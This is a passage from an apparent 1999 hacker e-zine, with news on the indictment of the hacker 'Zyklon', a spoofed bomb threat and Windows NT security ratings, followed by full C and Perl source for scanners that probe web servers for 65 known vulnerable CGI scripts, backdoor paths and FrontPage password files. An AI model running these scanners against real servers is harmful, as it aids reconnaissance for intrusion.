1030(a)(5)(A).)
COUNT 3
THE GRAND JURY CHARGES THAT:
From on or about December 28, 1998, through on or about
January 11, 1999, in the Eastern District of Virginia and
elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein,
knowingly and intentionally caused the transmission from a
computer in Shoreline, Washington, of programs, information,
codes, and commands, and as a result of such conduct,
intentionally caused damage without authorization to computers
operated by Issue Dynamics, Inc. in Alexandria, Virginia, and
Washington, D.C., which were protected computers used in
interstate commerce and communications, and caused loss
aggragating at least $5,000 to at least one individual between
December 28, 1998, and March 1, 1999.
(In violation of Title 18, United States Code, Section
1030(a)(5)(A).)
A TRUE BILL:
__________________________
FOREPERSON
UNITED STATES GRAND JURY
(signed)
______________________
Helen F. Fahey
United States Attorney
(signed)
______________________
Justin W. Williams
Assistant United States Attorney
Chief, Criminal Division
(signed)
______________________
Jack Henly
Assistant United States Attorney
Alleged USIA site hacker indicted
Grand jury hands down three counts of computer intrusion against Zyklon
By Brock N. Meeks
MSNBC
May 14 A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with
three counts of computer break-ins, including two high-profile hacks of the United States
Information Agency. Burns, well-known in the electronic underground by his code name Zyklon,
has also been questioned by the Secret Service in conjunction with other government site break-ins,
MSNBC has learned.
BURNS CODE NAME, MENTIONED in court
papers, taken from the poison gas used by the Nazis in concentration camps, was mentioned on the recent
hack of the White House Web site in a shout out (hacker slang for words of praise for a fellow hacker).
However, no details were available as to whether Burns was being questioned by the Secret Service in
conjunction with the White House hack.
One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other
government sites but not the White House hack.The Secret Service declined to comment. However, a
source familiar with the investigation, which was carried out by the Computer Crimes Division of the
Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also
investigating Burns.
Calls to the FBI to discuss their investigation of Burns were not returned. The three alleged break-ins
charged to Burns took place from August of last year to January, according to court papers.
Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke
to Burns said he was on a plane and heading for a court appearance in Virginia on Monday.
The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which
hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which has computers in Alexandria,
Va., and
Washington, D.C. Each count mentions damages of at least $5,000. The attack on USIAs web site in January was
particularly damaging and was the second time it had been allegedly hacked by Burns. Each of those hacks was
signed by Zyklon.
USIA, which operates the Voice of America broadcasts, is an extremely busy site; its a clearinghouse for
U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August,
destroyed a lot of the sites data, according to published reports at the time. The second break-in seemed to
be Burns way of working out his frustrations owing to a lost love.
Hack by Zyklon. Crystal, I love, (you?) the hacked site said. In another Zyklon hacked site, this one of
BellSouth, he laments that he has massive depression, that hes a loser and that because of it I will never
have my Crystal I will never be happy and I hope I goto [sic] prison and die.
Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News
Network, which mirrors the hacked site. This hack appears to be an act of so-called hacktivism in which hackers
break into systems, own them and put up politically charged speech.
-=-
ABC news;
Teen Hacker Indicted
Zyklon Not Charged in White House Attack
By Ted Bridis
The Associated Press
W A S H I N G T O N, May 15 A teen-ager identified as a computer hacker whose name appeared on the Internet
site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke
into another government computer. A grand jury indicted Eric Burns, 19, on three counts of computer intrusion.
Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998
and January 1999 in northern Virginia that is used by the U.S. Information Agency. Zyklon was one of a dozen
names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few
minutes before government computers automatically detected the intrusion.
A Serious Effort
The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet
of Fairfax, Va., and the other by Issue Dynamics of Washington. Sam Simon of Issue Dynamics said he was cooperating
with the FBI.
We firmly believe that computer criminals need to be identified, prosecuted and caught, and were pleased that
the FBI is not treating this as a minor matter. It wasnt an insignificant incident. It was a very concentrated,
serious effort over a period of time.
Burns was not charged in the attack on the White House computers.The opening page of the White House site was
altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along
with messages, Your box was own3d and Stop all the war.
The page also included the phrase, following peeps get some shouts, and listed a dozen names, including
Zyklon.
@HWA
11.0 IRC war and a Police HQ bomb threat send two headed for trouble..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CallerID Fooled In Omaha
contributed by hantai
A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the
address reported by CallerID. While the police where at that address another bomb threat was called
in from the same number. US West says that there are some "technical pieces of equipment" the criminals
could use to make a phone call appear to come from someones number without actually being at that phone.
(Yeah, it's called a butt set and telephone can on a street corner, real technical. Oh, and most of those
cans aren't even locked) HNN has received reports that the perpetrators of this prank are known as 'port'
and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC
channel.
Omaha NBC Affiliate Channel 6
http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html
Police investigate mystery
A threatening phone call has led police to a mystery and so far the clues have turned up
nothing more than dead ends.
The call was made to Omaha police headquarters Thursday night: a bomb threat.
With caller I-D on police phones, the name and address of the alleged caller was quickly
discovered
Police made their way to a northwest Omaha home.
Officer Don Savage says, "When they arrived,there they met a young man who said he had a
feeling that the police would be coming to his house that night."
The young man had received an anonymous message on his computer telling him to expect
a visit from the police.
While investigators were questioning the young man at his home, another call came in at police headquarters
from the same number and address.
Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the
sergeant confirmed no one had made a phone call from that house.
Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's
going to use the phone lines dishonestly. And they technically could tap into someone's phone line
from outside the house, never have to be in the person's home."
Ewart says it's virtually impossible for someone to use their computer to call in a threat from someone else's
phone line. She says the connection between voice and data are separated.
Right now police aren't sure what the computer connection is, or how the scheme was carried out.
But a threat to their own house won't go unpunished.
Channel six news talked to the family who's phone line has been used in this scheme. They are also baffled as to
how their phone line was tapped.
Police say they intend to stay on the case until an arrest is made.
@HWA
12.0 UK Labels Windows as 'secure'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
UK Labels Windows as Secure
contributed by toka25
The U.K. Information Technology Security Evaluation Criteria (ITSEC), must have been hit on the head,
dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and
Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security
evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the
testers have never heard about things like pwdump or L0phtCrack.
Microsoft Propaganda
http://www.microsoft.com/windows/dailynews/042999.htm
April 29, 1999
U.K. government evaluation confirms security
of Microsoft Windows NT 4.0 platform
Windows NT platform receives high security evaluation
LondonThe British government this week concluded that the
Microsoft® Windows NT® platform passes muster when it comes to
security.
After more than a year of intensive testing, the U.K.
Information Technology Security Evaluation Criteria
(ITSEC) certification board has awarded Windows NT
Server 4.0 and Windows NT Workstation 4.0 an
E3/FC-2 ratinggenerally acknowledged as the
highest security evaluation possible for a
general-purpose operating system. The security
standards agency evaluation included examinations of the source
code and design documentation of Windows NT 4.0 with Service Pack
3. Testers also had direct access to the engineers who designed and
tested the server operating system.
Their conclusion: the Windows NT 4.0 architecture provides robust
but flexible security.
"The successful ITSEC evaluation confirms the robust security and
design of Windows NT," said Edmund Muth, group product manager at
Microsoft. "The strong security and wide range of security-related
features in Windows NT benefit customersboth those in industries
where security is a paramount concern, like banking, government,
healthcare and the militaryand individuals who are concerned about
their privacy and e-commerce."
The comprehensive security architecture in the Windows NT platform
provides that level of safety. Its integrated security features include
strong authentication, fine-grained access control, real-world auditing
tools and secure communications.
Governments and enterprises around the world have already put
those features to use.
Last Fall, Brazil used a Windows NT-based network to securely host
the largest electronic elections in history. Requiring the highest level
of security, nearly 90 percent of NATO's headquarters and field sites
in Europe and the United States use a Windows NT-based system to
deliver tactical data and military messaging.
And in the private sector, one of New Zealand's largest banks counts
on Windows NT to provide secure banking over the Internet.
The ITSEC rating provides independent confirmation of the platform's
security features. ITSEC is the only evaluation scheme recognized by
the British government for use in secure and sensitive installations. It
is also officially recognized by the governments of many European
Union countries, Canada, the former Soviet republics and, with slight
variations, in New Zealand and Australia.
The E3/F-C2 evaluation is roughly equivalent to a
C2 evaluation under the U.S. Trusted Computer
Security Evaluation Criteria (TCSEC) regime,
better known as the "Orange Book." Microsoft is
separately pursuing a C2 evaluation for Windows NT 4.0, which is
expected to be completed shortly.
But security isn't the only thing this platform offers.
The multipurpose server operating system that forms the foundation
of the BackOffice® family, Windows NT Server 4.0 offers a
comprehensive set of services. From communications and file and
print services to a platform for building and hosting Web- and
client-server-based applications, Windows NT Server is built to meet
the many needs of business.
Windows NT Workstation 4.0, developed specifically for the business
environment, makes it easy to use, manage and integrate those
features. The operating system gives employees the intuitive look and
feel of Windows® 98, so companies can cut training costs, and
people can work productively right from the start.
The Windows NT platform is also the quickest path to Windows 2000,
which is designed to be Microsoft's most robust and reliable operating
system to date. Windows 2000 is also designed with security in mind.
Microsoft is taking orders for the Beta 3 versions of Windows 2000
Server and Workstation.
After Microsoft releases Windows 2000, the company plans to submit
the operating system for a similar security evaluation under the
Common Criteria, a new evaluation system that will consolidate the
TCSEC and ITSEC criteria.
The results of which could further the Windows platform's reputation
of providing secure computing.
@HWA
13.0 Yugoslavia to stay plugged in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Yugoslavia to Stay Online
contributed by Code Kid
After all the confusion of whether companies should or
should not pull the plug on Yugoslavia the Clinton
administration has promised not to unplug the region
from the rest of the net.
Wired
http://http://www.wired.com/news/news/politics/story/19697.html
14.0 VISA Releases Draft Protection Profile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Kingpin
According to Schneier's Crypto-Gram Visa has issued a draft of the "Visa Smart Card Protection Profile," as part
of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they
want comments.
Visa Smart Card Protection Profile
http://www.visa.com/nt/chip/accept.html (you must agree to a disclaimer before being allowed to dl
this pdf document)
The Visa document references the Common Criteria:
Common Criteria
http://csrc.ncsl.nist.gov/cc/
15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* ---------------------------------------------------------------------- */
/* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36); */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt,codex ;-) , K.A.L.U.G. */
/* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz */
/* NATO and bill klinton <---- double fuck! :-) huh */
/* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */
/* -----------------------------------------------[10:01 17.05.99 UnlG]- */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin,suxes=0;
char cgibuff[1024];
char *buff[100]; /* Don't u think 100 is enought? ;-)*/
char *cginame[100]; /* Don't u think 100 is enought? */
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
/* v0rt-fu when u modify source, check this first line.... that's my 8-) */
buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/nph-publish HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n";
buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n";
buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n";
buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n";
buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n";
buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n";
buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n";
buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n";
buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n";
buff[64] = "GET /search97.vts HTTP/1.0\n\n";
buff[65] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi ,
rule? ;-) */
cginame[1] = "UnlG - backd00r ";
cginame[2] = "THC - backd00r ";
cginame[3] = "phf..classic :) ";
cginame[4] = "Count.cgi ";
cginame[5] = "test-cgi ";
cginame[6] = "nph-test-cgi ";
cginame[7] = "nph-publish ";
cginame[8] = "php.cgi ";
cginame[9] = "handler ";
cginame[10] = "webgais ";
cginame[11] = "websendmail ";
cginame[12] = "webdist.cgi ";
cginame[13] = "faxsurvey ";
cginame[14] = "htmlscript ";
cginame[15] = "pfdisplay ";
cginame[16] = "perl.exe ";
cginame[17] = "wwwboard.pl ";
cginame[18] = "www-sql ";
cginame[19] = "view-source ";
cginame[20] = "campas ";
cginame[21] = "aglimpse ";
cginame[22] = "glimpse ";
cginame[23] = "man.sh ";
cginame[24] = "AT-admin.cgi ";
cginame[25] = "filemail.pl ";
cginame[26] = "maillist.pl ";
cginame[27] = "jj ";
cginame[28] = "info2www ";
cginame[29] = "files.pl ";
cginame[30] = "finger ";
cginame[31] = "bnbform.cgi ";
cginame[32] = "survey.cgi ";
cginame[33] = "AnyForm2 ";
cginame[34] = "textcounter.pl ";
cginame[35] = "classifields.cgi";
cginame[36] = "environ.cgi ";
cginame[37] = "wrap ";
cginame[38] = "cgiwrap ";
cginame[39] = "guestbook.cgi ";
cginame[40] = "edit.pl ";
cginame[41] = "perlshop.cgi ";
cginame[42] = "_vti_inf.html ";
cginame[43] = "service.pwd ";
cginame[44] = "users.pwd ";
cginame[45] = "authors.pwd ";
cginame[46] = "administrators ";
cginame[47] = "shtml.dll ";
cginame[48] = "shtml.exe ";
cginame[49] = "args.bat ";
cginame[50] = "uploader.exe ";
cginame[51] = "rguest.exe ";
cginame[52] = "wguest.exe ";
cginame[53] = "bdir - samples ";
cginame[54] = "CGImail.exe ";
cginame[55] = "newdsn.exe ";
cginame[56] = "fpcount.exe ";
cginame[57] = "openfile.cfm ";
cginame[58] = "exprcalc.cfm ";
cginame[59] = "dispopenedfile ";
cginame[60] = "sendmail.cfm ";
cginame[61] = "codebrws.asp ";
cginame[62] = "codebrws.asp 2 ";
cginame[63] = "showcode.asp ";
cginame[64] = "search97.vts ";
cginame[65] = "carbo.dll ";
if (argc<2)
{
printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]");
printf("\nusage : %s host ",argv[0]);
printf("\n Or : %s host -d for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80); /* <--- if u want scan another port change it */
/* codex when u again change this code pls call
proggi like this 1.35.1 or 1.35.[a..z] ;-) */
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 65) /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL) {
printf("Found !! ;)\n");++suxes; }
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("Press any key to continue....\n"); getchar();
}
close(sock);
}
if (suxes){ printf("...have a nice hack... ;-)\n");}
else {printf ("...n0thing wr0ng on server..... hmm...sucks!\n");}
}
@HWA
15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
##############################################
# #
# CGI scanner in perl #
# Written By: Epicurus (epicurus@wilter.com) #
# #
# Based on a C version by su1d sh3ll #
# #
##############################################
use Socket;
@cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n",
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n",
"GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n",
"GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n",
"GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n",
"GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n",
"GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n",
"GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n",
"GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n",
"GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n",
"GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n",
"GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n",
"GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n",
"GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n",
"GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n",
"GET /cgi-bin/survey.cgi HTTP/1.0\n\n",
"GET /cgi-bin/AnyForm2 HTTP/1.0\n\n",
"GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n",
"GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n",
"GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n",
"GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n",
"GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
@cgi_names = ("THC - backdoor ","phf ","Count.cgi ","test-cgi ","nph-test-cgi ",
"nph-publish ","php.cgi ","handler ","webgais ","websendmail ",
"webdist.cgi ","faxsurvey ","htmlscript ","pfdisplay ","perl.exe ",
"wwwboard.pl ","www-sql ","view-source ","campas ","aglimpse ",
"glimpse ","man.sh ","AT-admin.cgi ","filemail.pl ","maillist.pl ",
"jj ","info2www ","files.pl ","finger ","bnbform.cgi ",
"survey.cgi ","AnyForm2 ","textcounter.pl ","classifields.cgi","environ.cgi ",
"wrap ","cgiwrap ","guestbook.cgi ","edit.pl ","perlshop.cgi ",
"_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ",
"shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ",
"wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ",
"openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ",
"codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll ");
print "CGI scanner [in Perl] v1.0\n\n";
print "Host: ";
chomp($remote=<STDIN>);
print "HTTP Port [80]: ";
chomp($port=<STDIN>);
if($port eq "")
{
$port=80;
}
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i)
{
$log = 1;
$logfile="$remote".".scan";
print "Log File [$logfile]: ";
$file=<STDIN>;
chop($file) if $file =~ /\n$/;
if($file ne "")
{
$logfile=$file;
}
open(LOG,">>$logfile") || die("Unable to write to $logfile!");
print LOG "Scanning $remote port $port\n\n";
}
print "Press [enter] to check the httpd version...\n";
$blah=<STDIN>;
$submit = "HEAD / HTTP/1.0\r\n\r\n";
if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
&error("No port specified.") unless $port;
$iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
$proto = getprotobyname('tcp') || &error("Unable to get protocall!");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$submit,0);
while(<SOCK>)
{
print $_;
print LOG $_ if $log==1;
}
close(SOCK);
print "Press [enter] to check for CGI vulnerabilities...\n";
$blah=<STDIN>;
$i=0;
foreach $cgi_script(@cgi_scripts)
{
print "Searching for @cgi_names[$i] : ";
print LOG "Searching for @cgi_names[$i] : " if $log==1;
$submit=$cgi_script;
&connect_n_check;
$i++;
}
if($bad_security>0)
{
print "Server may have CGI vulnerabilities.\n";
print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1;
}
else
{
print "No known CGI vulnerabilities found.\n";
print LOG "No known CGI vulnerabilities found.\n\n" if $log==1;
}
close(LOG) if $log==1;
exit;
sub connect_n_check
{
if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
&error("No port specified.") unless $port;
$iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
$proto = getprotobyname('tcp') || &error("Unable to get protocall!");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$submit,0);
$check=<SOCK>;
($http,$code,$blah) = split(/ /,$check);
if($code == 200)
{
print "Found!\n";
print LOG "Found!\n" if $log==1;
$bad_security++;
}
else
{
print "Not Found\n";
print LOG "Not Found\n" if $log==1;
}
close(SOCK);
}
sub error
{
$error = shift(@_);
print "Error - $error\n";
print LOG "Error - $error\n\n" if $log==1;
close(LOG) if $log==1;
exit;
}
@HWA
16.0 Vulnerability in Netscape bookmarks found by George Guninski...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 16 May 1999 17:17:34 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator bookmarks <TITLE> security vulnerability
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they handle special
bookmarks
with JavaScript code in the title.
If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>
tag and bookmark that page, the JavaScript code is written in the local
bookmarks file.
